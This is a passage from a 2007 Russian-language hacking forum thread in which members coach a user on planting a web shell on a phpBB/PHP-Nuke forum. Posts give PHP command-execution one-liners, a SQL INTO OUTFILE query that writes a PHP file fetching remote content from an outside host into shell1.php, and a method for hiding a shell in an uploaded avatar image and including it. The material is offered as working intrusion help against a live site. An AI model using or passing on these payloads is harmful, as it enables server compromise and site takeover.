ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 04.07.2007, 23:01
Аватар для maxster
maxster
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
Провел на форуме:
2298631

Репутация: 380
Отправить сообщение для maxster с помощью ICQ
По умолчанию

попробуй багу с подменой аватарного пути

_http://forum.antichat.ru/showpost.php?p=281765&postcount=2
 
Ответить с цитированием

  #12  
Старый 04.07.2007, 23:11
Аватар для Spyder
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

хз, пробуй <? exec($_GET[cmd]); ?>
 
Ответить с цитированием

  #13  
Старый 05.07.2007, 01:07
Аватар для Azter
Azter
Познающий
Регистрация: 01.09.2005
Сообщений: 51
Провел на форуме:
208102

Репутация: 5
По умолчанию

safe mode - off
Spyder
Не катит =(
maxster
А смысл? там-же тоже через инклуд(или ты о 7 способе?)

Последний раз редактировалось Azter; 05.07.2007 в 01:12..
 
Ответить с цитированием

  #14  
Старый 05.07.2007, 02:11
Аватар для Scipio
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

а если сделать так?
Код:
SELECT '<? $filename = "http://host.narod.ru/files.txt"; $fd = fopen ($filename, "rb"); $fw=fopen("shell1.php","wb"); $contents = fread ($fd, filesize ($filename)); fwrite($fw,$contents); fclose($fw); fclose ($fd); ?>' FROM nuke_users LIMIT 1 INTO OUTFILE 'C:/bla/bla-bla/Forums/images/avatars/shell.php';
Да и с путями разберись
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #15  
Старый 05.07.2007, 12:41
Аватар для Azter
Azter
Познающий
Регистрация: 01.09.2005
Сообщений: 51
Провел на форуме:
208102

Репутация: 5
По умолчанию

Код:
SELECT '<? $filename = "http://host.narod.ru/files.txt"; $fd = fopen ($filename, "rb"); $fw=fopen("shell1.php","wb"); $contents = fread ($fd, filesize ($filename)); fwrite($fw,$contents); fclose($fw); fclose ($fd); ?>' FROM nuke_users LIMIT 1 INTO OUTFILE 'C:/bla/bla-bla/Forums/images/avatars/shell.php';
выбрасывает вот такую фигню
Цитата:
Warning: filesize() [function.filesize]: stat failed for http://host.narod.ru/files.txt in C:\bla\bla-bla\Forums\images\avatars\image.php on line 1

Warning: fread() [function.fread]: Length parameter must be greater than 0 in C:\bla\bla-bla\Forums\images\avatars\image.php on line 1
GrAmOzEkA
Пару раз уже говорил - не прокатит инклуд.
 
Ответить с цитированием

  #16  
Старый 05.07.2007, 19:28
Аватар для andy13
andy13
Участник форума
Регистрация: 04.02.2007
Сообщений: 120
Провел на форуме:
306837

Репутация: 36
По умолчанию

Почему бы просто не сделать так:
<? passthru("команда"); ?>
если по-другому не получается
 
Ответить с цитированием

  #17  
Старый 05.07.2007, 19:34
Аватар для Micr0b
Micr0b
Участник форума
Регистрация: 14.01.2006
Сообщений: 242
Провел на форуме:
2630617

Репутация: 245
Отправить сообщение для Micr0b с помощью ICQ
По умолчанию

andy13 - читай пост c411k на 1 странице
 
Ответить с цитированием

  #18  
Старый 05.07.2007, 23:29
Аватар для c411k
c411k
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
Провел на форуме:
8854279

Репутация: 2727


По умолчанию

мдя. выставляешь в админке phpbb максимальный размер загруж авы 150кб, грузишь аву http://c411k.jino-net.ru/upload/achat.gif
бэкапишь бд с запросом
Код:
SELECT '<?php include("/avatars/achat.gif"); ?>' FROM nuke_users LIMIT 1 INTO OUTFILE 'C:/bla/bla-bla/Forums/images/avatars/shell.php';
и у тебя есть полноценный шелл от рст. если не можешь изменить размер, то рисуешь в фотошопе пиксель 1х1, сохраняешь, открываешь в HEX-редакторе и встявляешь в конец маленький по размеру шелл.
__________________
ПИУ-ПИУ...
 
Ответить с цитированием

  #19  
Старый 06.07.2007, 09:01
Аватар для andy13
andy13
Участник форума
Регистрация: 04.02.2007
Сообщений: 120
Провел на форуме:
306837

Репутация: 36
По умолчанию

Micr0b, я писал про вставку команд напрямую
passthru("uname -a; id ..."), а не про передачу их через запросы.
 
Ответить с цитированием

  #20  
Старый 08.07.2007, 17:48
Аватар для tbody
tbody
Новичок
Регистрация: 07.07.2007
Сообщений: 21
Провел на форуме:
95348

Репутация: 1
Отправить сообщение для tbody с помощью ICQ
По умолчанию

А если там стоит ASP.Net без ПХП, то что тогда использовать?
Есть только возможность править страницу.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Проблемы с заливкой шелла в ipb anakreon Форумы 8 18.03.2007 15:20
Моделирование программно-аппаратных ''реактивных'' систем раскрашенными сетями Петри bxN5 Чужие Статьи 1 09.03.2007 15:50
Проблемы с заливкой шелла на phpbb AlexCRC Форумы 8 21.10.2006 17:37
UBB Threads 6.5.1 (Инструкция по заливке шелла) pch Форумы 0 30.04.2006 20:20
Проблемы с Аничатовскими штучками. temon Болталка 4 27.09.2005 12:52



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ